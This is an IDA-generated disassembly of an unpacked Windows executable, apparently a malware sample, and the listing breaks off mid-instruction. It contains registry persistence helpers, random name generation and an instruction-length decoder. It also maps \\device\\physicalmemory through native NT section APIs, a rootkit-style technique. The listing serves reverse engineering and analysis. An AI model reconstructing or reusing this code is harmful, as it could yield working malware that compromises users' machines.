; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : F00F427B94E8602A0E9C4E1FE7FA2F59 ; File Name : u:\work\f00f427b94e8602a0e9c4e1fe7fa2f59_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 400000 ; Section 1. (virtual address 00001000) ; Virtual size : 00007000 ( 28672.) ; Section size in file : 00007000 ( 28672.) ; Offset to raw data for section: 00001000 ; Flags C0000040: Data Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write _text segment para public 'DATA' use32 assume cs:_text ;org 401000h assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing ; =============== S U B R O U T I N E ======================================= sub_401000 proc near ; DATA XREF: sub_401020+Ao ; sub_41CE01+Ao arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_C = dword ptr 10h xor eax, eax inc eax mov ecx, [esp+arg_0] test dword ptr [ecx+4], 6 jz short locret_40101F mov eax, [esp+arg_4] mov edx, [esp+arg_C] mov [edx], eax mov eax, 3 locret_40101F: ; CODE XREF: sub_401000+Ej retn sub_401000 endp ; =============== S U B R O U T I N E ======================================= sub_401020 proc near ; CODE XREF: sub_40109A+BEp ; sub_40109A+ECp var_14 = dword ptr -14h arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ebx push esi push edi mov eax, [esp+0Ch+arg_0] push eax push 0FFFFFFFEh push offset sub_401000 push large dword ptr fs:0 mov large fs:0, esp loc_40103D: ; CODE XREF: sub_401020+44j ; sub_401020+4Aj mov eax, [esp+1Ch+arg_0] mov ebx, [eax+8] mov esi, [eax+0Ch] cmp esi, 0FFFFFFFFh jz short loc_40106C cmp esi, [esp+1Ch+arg_4] jz short loc_40106C lea esi, [esi+esi*2] mov ecx, [ebx+esi*4] mov ecx, [esp+1Ch+var_14] mov ecx, [eax+0Ch] cmp dword ptr [ebx+esi*4+4], 0 jnz short loc_40103D call dword ptr [ebx+esi*4+8] jmp short loc_40103D ; --------------------------------------------------------------------------- loc_40106C: ; CODE XREF: sub_401020+2Aj ; sub_401020+30j pop large dword ptr fs:0 add esp, 0Ch pop edi pop esi pop ebx retn sub_401020 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40107A proc near ; CODE XREF: sub_40109A+B1p arg_0 = dword ptr 8 push ebp mov ebp, esp push ebx push esi push edi push ebp push 0 push 0 push offset sub_401092 push [ebp+arg_0] call sub_407AA4 ; RtlUnwind sub_40107A endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_401092 proc near ; DATA XREF: sub_40107A+Bo ; sub_41CE5B+Bo pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn sub_401092 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40109A proc near ; DATA XREF: sub_401219+10o ; sub_404ED7+Ao ... var_14 = dword ptr -14h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h cld push ebp mov ebp, esp sub esp, 8 push ebx push esi push edi push ebp mov ebx, [ebp+arg_4] mov eax, [ebp+arg_0] mov dword_41A08C, eax mov dword_41A090, ebx test dword ptr [eax+4], 6 jnz loc_40117F mov [ebp+var_8], eax mov eax, [ebp+arg_8] mov [ebp+var_4], eax mov dword_41A090, eax lea eax, [ebp+var_8] mov [ebx-4], eax mov esi, [ebx+0Ch] mov edi, [ebx+8] loc_4010DD: ; CODE XREF: sub_40109A+DCj cmp esi, 0FFFFFFFFh jz loc_40118E lea ecx, [esi+esi*2] cmp dword ptr [edi+ecx*4+4], 0 jz short loc_40116D push esi push ebp lea ebp, [ebx+10h] mov eax, [ebp+var_14] mov eax, [eax] mov eax, [eax] mov dword_41A030, eax mov edx, [ebp+var_14] mov eax, [edx] mov dword_41A034, eax mov eax, [edx+4] mov dword_41A038, eax push esi push edi push ecx mov ecx, 14h lea edi, dword_41A03C mov esi, dword_41A034 rep movsd lea edi, dword_41A03C mov dword_41A034, edi pop ecx pop edi pop esi call dword ptr [edi+ecx*4+4] pop ebp pop esi mov ebx, [ebp+arg_4] or eax, eax jz short loc_40116D js short loc_40117B mov edi, [ebx+8] push ebx call sub_40107A add esp, 4 lea ebp, [ebx+10h] push esi push ebx call sub_401020 add esp, 8 lea ecx, [esi+esi*2] mov eax, [edi+ecx*4] mov eax, [ebx+0Ch] call dword ptr [edi+ecx*4+8] loc_40116D: ; CODE XREF: sub_40109A+54j ; sub_40109A+A9j mov edi, [ebx+8] lea ecx, [esi+esi*2] mov esi, [edi+ecx*4] jmp loc_4010DD ; --------------------------------------------------------------------------- loc_40117B: ; CODE XREF: sub_40109A+ABj xor eax, eax jmp short loc_4011F0 ; --------------------------------------------------------------------------- loc_40117F: ; CODE XREF: sub_40109A+23j push ebp lea ebp, [ebx+10h] push 0FFFFFFFFh push ebx call sub_401020 add esp, 0Ch loc_40118E: ; CODE XREF: sub_40109A+46j push 0 mov dword_41A010, 0Bh push 0Bh call sub_407E34 add esp, 8 or eax, eax jnz short loc_4011C9 push 0 mov dword_41A010, 8 push 8 call sub_407E34 add esp, 8 or eax, eax jnz short loc_4011C9 mov eax, 1 jmp short loc_4011F0 ; --------------------------------------------------------------------------- loc_4011C9: ; CODE XREF: sub_40109A+10Cj ; sub_40109A+126j cmp eax, 0FFFFFFFFh jz short loc_4011F8 push eax push dword_41A010 call sub_407E34 add esp, 8 push dword_41A010 call sub_407E1C add esp, 4 mov eax, 1 loc_4011F0: ; CODE XREF: sub_40109A+E3j ; sub_40109A+12Dj ... pop ebp pop edi pop esi pop ebx mov esp, ebp pop ebp retn ; --------------------------------------------------------------------------- loc_4011F8: ; CODE XREF: sub_40109A+132j cmp dword_41A02C, 0 jnz short loc_401208 mov eax, 1 jmp short loc_4011F0 ; --------------------------------------------------------------------------- loc_401208: ; CODE XREF: sub_40109A+165j mov eax, dword_41A02C push 0Bh jmp eax sub_40109A endp ; --------------------------------------------------------------------------- pop eax mov eax, 1 jmp short loc_4011F0 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401219 proc near ; CODE XREF: start+500j ; DATA XREF: start:loc_4274FCo var_30 = word ptr -30h var_18 = dword ptr -18h var_4 = dword ptr -4 mov eax, large fs:0 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_41A01C push offset sub_40109A push eax mov large fs:0, esp sub esp, 10h push ebx push esi push edi mov [ebp+var_18], esp push eax fnstcw [esp+30h+var_30] or [esp+30h+var_30], 300h fldcw [esp+30h+var_30] add esp, 4 push 0 push 0 push offset dword_41A028 push offset dword_41A024 push offset dword_41A020 call sub_407DBC push dword_41A028 push dword_41A024 push dword_41A020 mov dword_41A014, esp call sub_407868 add esp, 18h xor ecx, ecx mov [ebp+var_4], ecx push eax call sub_407DEC leave retn sub_401219 endp ; --------------------------------------------------------------------------- mov large fs:0, eax retn ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_40129C proc near ; CODE XREF: sub_404FCE+E9p var_14C0C = dword ptr -14C0Ch var_14C08 = byte ptr -14C08h push ebp mov ebp, esp mov eax, 14C0Ch call sub_4078CC push esi push edi push 0 push 0 push 3 push 0 push 0 push 80000000h push offset dword_408120 call sub_407A8C ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jnz short loc_4012CF xor eax, eax jmp short loc_401322 ; --------------------------------------------------------------------------- loc_4012CF: ; CODE XREF: sub_40129C+2Dj push 0 lea eax, [ebp+var_14C0C] push eax push 14C08h lea eax, [ebp+var_14C08] push eax push esi call sub_407A98 ; ReadFile push esi call sub_407984 ; CloseHandle xor edi, edi loc_4012F2: ; CODE XREF: sub_40129C+82j push 1 push offset byte_419260 lea eax, [ebp+edi+var_14C08] push eax call sub_401429 add esp, 0Ch cmp eax, 0FFFFh jz short loc_401315 xor eax, eax inc eax jmp short loc_401322 ; --------------------------------------------------------------------------- loc_401315: ; CODE XREF: sub_40129C+72j add edi, 11h cmp edi, [ebp+var_14C0C] jb short loc_4012F2 xor eax, eax loc_401322: ; CODE XREF: sub_40129C+31j ; sub_40129C+77j pop edi pop esi leave retn sub_40129C endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401326 proc near ; CODE XREF: sub_403D8E+65p ; sub_405AAC+DDp ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ecx push edi lea eax, [ebp+var_4] push eax push 20019h push 0 push [ebp+arg_4] push [ebp+arg_0] call sub_407D44 ; RegOpenKeyExA mov edi, eax or edi, edi jz short loc_40134B xor eax, eax jmp short loc_401376 ; --------------------------------------------------------------------------- loc_40134B: ; CODE XREF: sub_401326+1Fj push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_14] push 0 push [ebp+arg_8] push [ebp+var_4] call sub_407D50 ; RegQueryValueExA mov edi, eax push [ebp+var_4] call sub_407D38 ; RegCloseKey or edi, edi jz short loc_401373 xor eax, eax jmp short loc_401376 ; --------------------------------------------------------------------------- loc_401373: ; CODE XREF: sub_401326+47j xor eax, eax inc eax loc_401376: ; CODE XREF: sub_401326+23j ; sub_401326+4Bj pop edi leave retn sub_401326 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401379 proc near ; CODE XREF: sub_403BC5+55p ; sub_403BC5+76p ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push ecx push eax push edi lea eax, [ebp+var_8] push eax lea eax, [ebp+var_4] push eax push 0 push 0F003Fh push 0 push 0 push 0 push [ebp+arg_4] push [ebp+arg_0] call sub_407D2C ; RegCreateKeyExA mov edi, eax or edi, edi jz short loc_4013A9 xor eax, eax jmp short loc_4013E1 ; --------------------------------------------------------------------------- loc_4013A9: ; CODE XREF: sub_401379+2Aj push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_14] push 0 push [ebp+arg_8] push [ebp+var_4] call sub_407D5C ; RegSetValueExA mov edi, eax push [ebp+var_4] call sub_407D38 ; RegCloseKey or edi, edi jz short loc_4013D1 xor eax, eax jmp short loc_4013E1 ; --------------------------------------------------------------------------- loc_4013D1: ; CODE XREF: sub_401379+52j cmp [ebp+var_8], 1 jnz short loc_4013DE mov eax, 2 jmp short loc_4013E1 ; --------------------------------------------------------------------------- loc_4013DE: ; CODE XREF: sub_401379+5Cj xor eax, eax inc eax loc_4013E1: ; CODE XREF: sub_401379+2Ej ; sub_401379+56j ... pop edi leave retn sub_401379 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4013E4 proc near ; CODE XREF: sub_403659+CEp ; sub_405AAC+25p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ebx push esi push edi mov ebx, [ebp+arg_0] xor esi, esi jmp short loc_401416 ; --------------------------------------------------------------------------- loc_4013F1: ; CODE XREF: sub_4013E4+35j call sub_407E28 mov edx, 10624DD3h push ecx mov ecx, eax imul edx sar edx, 7 sar ecx, 1Fh sub edx, ecx mov eax, edx pop ecx mov edi, eax add edi, 61h mov edx, edi mov [ebx+esi], dl inc esi loc_401416: ; CODE XREF: sub_4013E4+Bj cmp esi, [ebp+arg_4] jl short loc_4013F1 mov eax, [ebp+arg_4] mov byte ptr [ebx+eax], 0 mov eax, ebx pop edi pop esi pop ebx pop ebp retn sub_4013E4 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401429 proc near ; CODE XREF: sub_40129C+65p ; sub_4034AD+30p ... var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push eax push ebx push esi push edi mov esi, [ebp+arg_4] and [ebp+var_8], 0 and [ebp+var_4], 0 jmp short loc_40148D ; --------------------------------------------------------------------------- loc_40143E: ; CODE XREF: sub_401429+76j xor ebx, ebx mov edi, ebx jmp short loc_40147A ; --------------------------------------------------------------------------- loc_401444: ; CODE XREF: sub_401429+5Fj mov eax, [ebp+var_4] add eax, edi mov edx, [ebp+arg_0] movsx eax, byte ptr [edx+eax] movsx edx, byte ptr [esi+edi] cmp eax, edx jnz short loc_401459 inc ebx loc_401459: ; CODE XREF: sub_401429+2Dj mov ecx, esi or eax, 0FFFFFFFFh loc_40145E: ; CODE XREF: sub_401429+3Aj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40145E cmp ebx, eax jnz short loc_401479 inc [ebp+var_8] mov eax, [ebp+arg_8] cmp [ebp+var_8], eax jnz short loc_401479 mov eax, [ebp+var_4] jmp short loc_4014A6 ; --------------------------------------------------------------------------- loc_401479: ; CODE XREF: sub_401429+3Ej ; sub_401429+49j inc edi loc_40147A: ; CODE XREF: sub_401429+19j mov ecx, esi or eax, 0FFFFFFFFh loc_40147F: ; CODE XREF: sub_401429+5Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_40147F cmp edi, eax jb short loc_401444 inc [ebp+var_4] loc_40148D: ; CODE XREF: sub_401429+13j mov eax, [ebp+arg_0] mov ecx, eax or eax, 0FFFFFFFFh loc_401495: ; CODE XREF: sub_401429+71j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_401495 cmp [ebp+var_4], eax jb short loc_40143E mov eax, 0FFFFh loc_4014A6: ; CODE XREF: sub_401429+4Ej pop edi pop esi pop ebx leave retn sub_401429 endp ; --------------------------------------------------------------------------- push ebx push esi push edi mov esi, [esp+18h] mov ebx, [esp+1Ch] mov edi, esi jmp short loc_4014D8 ; --------------------------------------------------------------------------- loc_4014BA: ; CODE XREF: .text:004014DAj mov eax, [esp+10h] movsx eax, byte ptr [eax+edi] mov edx, edi sub edx, esi mov ecx, [esp+14h] movsx edx, byte ptr [ecx+edx] cmp eax, edx jz short loc_4014D7 xor eax, eax inc eax jmp short loc_4014DE ; --------------------------------------------------------------------------- loc_4014D7: ; CODE XREF: .text:004014D0j inc edi loc_4014D8: ; CODE XREF: .text:004014B8j cmp edi, ebx jl short loc_4014BA xor eax, eax loc_4014DE: ; CODE XREF: .text:004014D5j pop edi pop esi pop ebx retn ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4014E2 proc near ; CODE XREF: sub_403659+2Fp ; sub_403D8E+29Fp ... var_8 = dword ptr -8 var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push eax push ebx push esi push edi push 0 push 80h push 3 push 0 push 3 push 80000000h push [ebp+arg_0] call sub_407A8C ; CreateFileA mov edi, eax cmp edi, 0FFFFFFFFh jnz short loc_40151B cmp [ebp+arg_4], 0 jz short loc_401517 mov eax, [ebp+arg_4] and dword ptr [eax], 0 loc_401517: ; CODE XREF: sub_4014E2+2Dj xor eax, eax jmp short loc_40155B ; --------------------------------------------------------------------------- loc_40151B: ; CODE XREF: sub_4014E2+27j push 0 push edi call sub_407954 ; GetFileSize mov esi, eax add eax, 10h push eax push 40h call sub_407A5C ; LocalAlloc mov ebx, eax push 0 cmp [ebp+arg_4], 0 jz short loc_401542 mov eax, [ebp+arg_4] mov [ebp+var_8], eax jmp short loc_401548 ; --------------------------------------------------------------------------- loc_401542: ; CODE XREF: sub_4014E2+56j lea eax, [ebp+var_4] mov [ebp+var_8], eax loc_401548: ; CODE XREF: sub_4014E2+5Ej push [ebp+var_8] push esi push ebx push edi call sub_407A98 ; ReadFile push edi call sub_407984 ; CloseHandle mov eax, ebx loc_40155B: ; CODE XREF: sub_4014E2+37j pop edi pop esi pop ebx leave retn sub_4014E2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401560 proc near ; CODE XREF: sub_403659+3CBp ; sub_405AAC+76Fp push ebp mov ebp, esp push ebx push esi sub_401560 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_401565 proc near ; DATA XREF: .data:0041DF15o push edi mov esi, [ebp+8] mov ebx, [ebp+0Ch] mov edi, ebx jmp short loc_40159E ; --------------------------------------------------------------------------- loc_401570: ; CODE XREF: sub_401565+3Dj cmp byte ptr [esi+edi], 0Dh jnz short loc_40159D mov eax, edi sub eax, ebx push eax mov eax, esi add eax, ebx push eax push dword ptr [ebp+10h] call sub_407E04 add esp, 0Ch mov eax, edi sub eax, ebx mov edx, [ebp+10h] mov byte ptr [edx+eax], 0 mov eax, edi add eax, 2 jmp short loc_4015E7 ; --------------------------------------------------------------------------- loc_40159D: ; CODE XREF: sub_401565+Fj inc edi loc_40159E: ; CODE XREF: sub_401565+9j cmp byte ptr [esi+edi], 0 jnz short loc_401570 or ebx, ebx jz short loc_4015C2 cmp byte ptr [esi+edi], 0 jnz short loc_4015C2 mov eax, edi dec eax cmp byte ptr [esi+eax], 0Ah jnz short loc_4015C2 mov eax, [ebp+10h] mov byte ptr [eax], 0 mov eax, ebx inc eax jmp short loc_4015E7 ; --------------------------------------------------------------------------- loc_4015C2: ; CODE XREF: sub_401565+41j ; sub_401565+47j ... mov eax, esi add eax, ebx push eax call sub_407B4C ; lstrlenA mov edi, eax or edi, edi jz short loc_4015E5 mov eax, esi add eax, ebx push eax push dword ptr [ebp+10h] call sub_4078EC mov eax, ebx add eax, edi jmp short loc_4015E7 ; --------------------------------------------------------------------------- loc_4015E5: ; CODE XREF: sub_401565+6Bj xor eax, eax loc_4015E7: ; CODE XREF: sub_401565+36j ; sub_401565+5Bj ... pop edi pop esi pop ebx pop ebp retn sub_401565 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4015EC proc near ; CODE XREF: sub_401D98+53p var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push eax push ebx push esi mov esi, [ebp+arg_0] inc dword_41A1FC mov ecx, esi and ds:dword_408004, 0 and ds:dword_408FF4, 0 and ds:dword_40900C, 0 and ds:dword_408110, 0 mov ds:dword_408FD8, 4 mov ds:dword_408A34, 4 loc_40162E: ; CODE XREF: sub_4015EC+100j ; sub_4015EC+11Cj ... mov eax, ecx inc ecx mov al, [eax] mov ds:byte_408A30, al movzx eax, ds:byte_408A30 or eax, eax jl loc_401874 cmp eax, 0FFh jg loc_401874 jmp off_41A200[eax*4] loc_401659: ; CODE XREF: sub_4015EC+24Dj ; DATA XREF: .data:off_41A200o ... or byte ptr ds:dword_408FF4, 40h jmp loc_401874 ; --------------------------------------------------------------------------- inc dword_41A1FC loc_40166B: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... xor eax, eax cmp byte ptr [ecx], 20h setnz al dec eax and eax, 4 inc eax mov [ebp+var_4], eax add ds:dword_40900C, eax jmp loc_401874 ; --------------------------------------------------------------------------- loc_401686: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... or byte ptr ds:dword_408FF4, 40h test byte ptr [ecx], 38h jnz loc_401874 loc_401696: ; CODE XREF: sub_4015EC+66j ; DATA XREF: .data:0041A210o ... test ds:byte_408A30, 1 jz short loc_4016AF mov eax, ds:dword_408FD8 add ds:dword_40900C, eax jmp loc_401874 ; --------------------------------------------------------------------------- loc_4016AF: ; CODE XREF: sub_4015EC+B1j inc ds:dword_40900C jmp loc_401874 ; --------------------------------------------------------------------------- loc_4016BA: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... inc ds:dword_40900C jmp loc_401874 ; --------------------------------------------------------------------------- inc dword_41A1FC loc_4016CB: ; CODE XREF: sub_4015EC+66j ; DATA XREF: .data:0041A298o ... test byte ptr ds:dword_408FF4, 10h jz short loc_4016DB xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_4016DB: ; CODE XREF: sub_4015EC+E6j or byte ptr ds:dword_408FF4, 10h mov al, ds:byte_408A30 mov ds:byte_40811C, al jmp loc_40162E ; --------------------------------------------------------------------------- loc_4016F1: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... test byte ptr ds:dword_408FF4, 4 jz short loc_401701 xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_401701: ; CODE XREF: sub_4015EC+10Cj or byte ptr ds:dword_408FF4, 4 jmp loc_40162E ; --------------------------------------------------------------------------- loc_40170D: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... test byte ptr ds:dword_408FF4, 8 jz short loc_40171D xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_40171D: ; CODE XREF: sub_4015EC+128j or byte ptr ds:dword_408FF4, 8 mov al, ds:byte_408A30 mov ds:byte_409120, al jmp loc_40162E ; --------------------------------------------------------------------------- loc_401733: ; CODE XREF: sub_4015EC+66j ; DATA XREF: .data:0041A398o test byte ptr ds:dword_408FF4, 1 jz short loc_401743 xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_401743: ; CODE XREF: sub_4015EC+14Ej or byte ptr ds:dword_408FF4, 1 mov ds:dword_408FD8, 2 jmp loc_40162E ; --------------------------------------------------------------------------- loc_401759: ; CODE XREF: sub_4015EC+66j ; DATA XREF: .data:0041A39Co test byte ptr ds:dword_408FF4, 2 jz short loc_401769 xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_401769: ; CODE XREF: sub_4015EC+174j or byte ptr ds:dword_408FF4, 2 mov ds:dword_408A34, 2 jmp loc_40162E ; --------------------------------------------------------------------------- inc dword_41A1FC loc_401785: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... inc ds:dword_40900C or byte ptr ds:dword_408FF4, 40h jmp loc_401874 ; --------------------------------------------------------------------------- loc_401797: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... mov eax, ds:dword_408FD8 add ds:dword_40900C, eax or byte ptr ds:dword_408FF4, 40h jmp loc_401874 ; --------------------------------------------------------------------------- loc_4017AE: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... mov eax, ds:dword_408FD8 add eax, 2 add ds:dword_40900C, eax jmp loc_401874 ; --------------------------------------------------------------------------- loc_4017C1: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... mov eax, ds:dword_408A34 add ds:dword_408110, eax jmp loc_401874 ; --------------------------------------------------------------------------- loc_4017D1: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... mov eax, ds:dword_408FD8 add ds:dword_40900C, eax jmp loc_401874 ; --------------------------------------------------------------------------- inc dword_41A1FC loc_4017E7: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... add ds:dword_40900C, 2 jmp loc_401874 ; --------------------------------------------------------------------------- loc_4017F3: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... add ds:dword_40900C, 3 jmp short loc_401874 ; --------------------------------------------------------------------------- loc_4017FC: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+24Dj ; DATA XREF: ... xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_401803: ; CODE XREF: sub_4015EC+66j ; DATA XREF: .data:0041A23Co or byte ptr ds:dword_408FF4, 20h mov eax, ecx inc ecx mov al, [eax] mov ds:byte_419130, al movzx eax, ds:byte_419130 or eax, eax jl short loc_40186D cmp eax, 0Bh jg short loc_40182B jmp off_41A600[eax*4] ; --------------------------------------------------------------------------- loc_40182B: ; CODE XREF: sub_4015EC+236j cmp eax, 80h jl short loc_40186D cmp eax, 0CFh jg short loc_40186D jmp off_41A430[eax*4] loc_401840: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+238j ; DATA XREF: ... or byte ptr ds:dword_408FF4, 40h jmp short loc_401874 ; --------------------------------------------------------------------------- inc dword_41A1FC jmp short loc_401874 ; --------------------------------------------------------------------------- loc_401851: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+238j ... mov eax, ds:dword_408FD8 add ds:dword_40900C, eax jmp short loc_401874 ; --------------------------------------------------------------------------- loc_40185E: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+238j ... inc ds:dword_40900C or byte ptr ds:dword_408FF4, 40h jmp short loc_401874 ; --------------------------------------------------------------------------- loc_40186D: ; CODE XREF: sub_4015EC+66j ; sub_4015EC+231j ... xor eax, eax jmp loc_40199D ; --------------------------------------------------------------------------- loc_401874: ; CODE XREF: sub_4015EC+55j ; sub_4015EC+60j ... inc dword_41A1FC test byte ptr ds:dword_408FF4, 40h jz loc_40192F mov eax, ecx inc ecx mov al, [eax] mov ds:byte_419144, al movzx eax, ds:byte_419144 and eax, 0C0h mov byte ptr [ebp+var_4+3], al movzx eax, ds:byte_419144 and eax, 7 mov byte ptr [ebp+var_4+2], al movzx eax, byte ptr [ebp+var_4+3] cmp eax, 0C0h jz short loc_40192F cmp byte ptr [ebp+var_4+3], 40h jnz short loc_4018C4 inc ds:dword_408110 loc_4018C4: ; CODE XREF: sub_4015EC+2D0j movzx eax, byte ptr [ebp+var_4+3] cmp eax, 80h jnz short loc_4018DA mov eax, ds:dword_408A34 add ds:dword_408110, eax loc_4018DA: ; CODE XREF: sub_4015EC+2E1j cmp ds:dword_408A34, 2 jnz short loc_4018F8 cmp byte ptr [ebp+var_4+3], 0 jnz short loc_40192F cmp byte ptr [ebp+var_4+2], 6 jnz short loc_40192F add ds:dword_408110, 2 jmp short loc_40192F ; --------------------------------------------------------------------------- loc_4018F8: ; CODE XREF: sub_4015EC+2F5j cmp byte ptr [ebp+var_4+2], 4 jnz short loc_40191C or byte ptr ds:dword_408FF4, 80h mov eax, ecx inc ecx mov al, [eax] mov ds:byte_408FD4, al movzx eax, ds:byte_408FD4 and eax, 7 mov byte ptr [ebp+var_4+2], al loc_40191C: ; CODE XREF: sub_4015EC+310j cmp byte ptr [ebp+var_4+2], 5 jnz short loc_40192F cmp byte ptr [ebp+var_4+3], 0 jnz short loc_40192F add ds:dword_408110, 4 loc_40192F: ; CODE XREF: sub_4015EC+295j ; sub_4015EC+2CAj ... and ds:dword_408114, 0 jmp short loc_401950 ; --------------------------------------------------------------------------- loc_401938: ; CODE XREF: sub_4015EC+36Fj mov eax, ecx inc ecx mov edx, ds:dword_408114 mov al, [eax] mov ds:byte_408A28[edx], al inc ds:dword_408114 loc_401950: ; CODE XREF: sub_4015EC+34Aj mov eax, ds:dword_408110 cmp ds:dword_408114, eax jb short loc_401938 and ds:dword_408114, 0 jmp short loc_40197E ; --------------------------------------------------------------------------- loc_401966: ; CODE XREF: sub_4015EC+39Dj mov eax, ecx inc ecx mov edx, ds:dword_408114 mov al, [eax] mov ds:byte_419370[edx], al inc ds:dword_408114 loc_40197E: ; CODE XREF: sub_4015EC+378j mov eax, ds:dword_40900C cmp ds:dword_408114, eax jb short loc_401966 inc dword_41A1FC mov eax, ecx sub eax, esi mov ds:dword_408004, eax xor eax, eax inc eax loc_40199D: ; CODE XREF: sub_4015EC+EAj ; sub_4015EC+110j ... pop esi pop ebx leave retn sub_4015EC endp ; =============== S U B R O U T I N E ======================================= sub_4019A1 proc near ; CODE XREF: sub_401EAF+10p push edi push offset aNtdll_dll ; "ntdll.dll" call sub_407978 ; GetModuleHandleA mov edi, eax push offset aRtlinitunicode ; "RtlInitUnicodeString" push edi call sub_407990 ; GetProcAddress mov ds:dword_41913C, eax push offset aNtunmapviewofs ; "NtUnmapViewOfSection" push edi call sub_407990 ; GetProcAddress mov ds:dword_408FF0, eax push offset aNtopensection ; "NtOpenSection" push edi call sub_407990 ; GetProcAddress mov ds:dword_408FE0, eax push offset aNtmapviewofsec ; "NtMapViewOfSection" push edi call sub_407990 ; GetProcAddress mov ds:dword_409004, eax push offset aRtlntstatustod ; "RtlNtStatusToDosError" push edi call sub_407990 ; GetProcAddress mov ds:dword_419138, eax pop edi retn sub_4019A1 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_401A00 proc near ; CODE XREF: sub_401EAF+134p var_64 = byte ptr -64h var_60 = dword ptr -60h var_5C = dword ptr -5Ch var_58 = byte ptr -58h var_50 = dword ptr -50h var_4C = dword ptr -4Ch var_48 = dword ptr -48h var_44 = byte ptr -44h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 64h push esi push edi push offset aDevicePhysical ; "\\device\\physicalmemory" lea eax, [ebp+var_58] push eax call ds:dword_41913C mov [ebp+var_18], 18h and [ebp+var_14], 0 lea eax, [ebp+var_58] mov [ebp+var_10], eax mov [ebp+var_C], 40h and [ebp+var_8], 0 and [ebp+var_4], 0 and 